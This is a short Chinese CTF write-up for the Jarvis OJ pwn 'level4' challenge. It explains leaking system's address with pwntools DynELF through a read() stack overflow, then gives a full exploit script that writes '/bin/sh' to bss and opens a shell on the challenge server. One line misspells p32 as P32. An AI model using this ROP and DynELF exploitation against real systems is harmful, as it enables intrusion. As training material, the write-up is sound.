Jarvis OJ-pwn level4（利用DynElf泄漏system地址）

pwn level4

借助DynELF实现无libc的漏洞:这篇讲的挺好

1. 检查保护机制
   
2. ida打开文件，发现read函数栈溢出漏洞，想要用ret2libc解决，但是在漏洞函数前没有其他函数执行，所以不能进行泄漏函数得到libc版本。
   
   
3. 在无libc情况下，通过DynELF进行泄漏system函数。有了system地址，但是没有binsh字符串，这里可以通过read函数，从标准输入，写到bss段，然后把写入bss地址的内容作为system函数的参数，实现利用。
4. 寻找bss段地址：在gdb里输入vmmap即可，找到可读可写的地址范围。
   
   
5. 利用脚本如下：

from pwn import *
r = remote("pwn2.jarvisoj.com",9880)
e = ELF('./level4')
write_plt = e.symbols['write']
vul_addr = 0x804844b
bss_addr = 0x804a024
def leak(address):  #这是DynELF泄漏system的模版
    payload1 = 'a'*0x88+'bbbb'+p32(write_plt)+p32(vul_addr)+P32(1)+p32(address)+p32(4)
    r.sendline(payload1)
    data = r.recv(4)
    return data
d = DynELF(leak,elf=e)
system_addr = d.lookup('system','libc')
print hex(system_addr)
read_plt = e.symbols['read']
payload2 = 'a'*0x88+'bbbb'+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
r.sendline(payload2)
r.send('/bin/sh\x00')
payload3 = 'a'*0x88+'bbbb'+p32(system_addr)+'bbbb'+p32(bss_addr)
r.sendline(payload3)
r.interactive()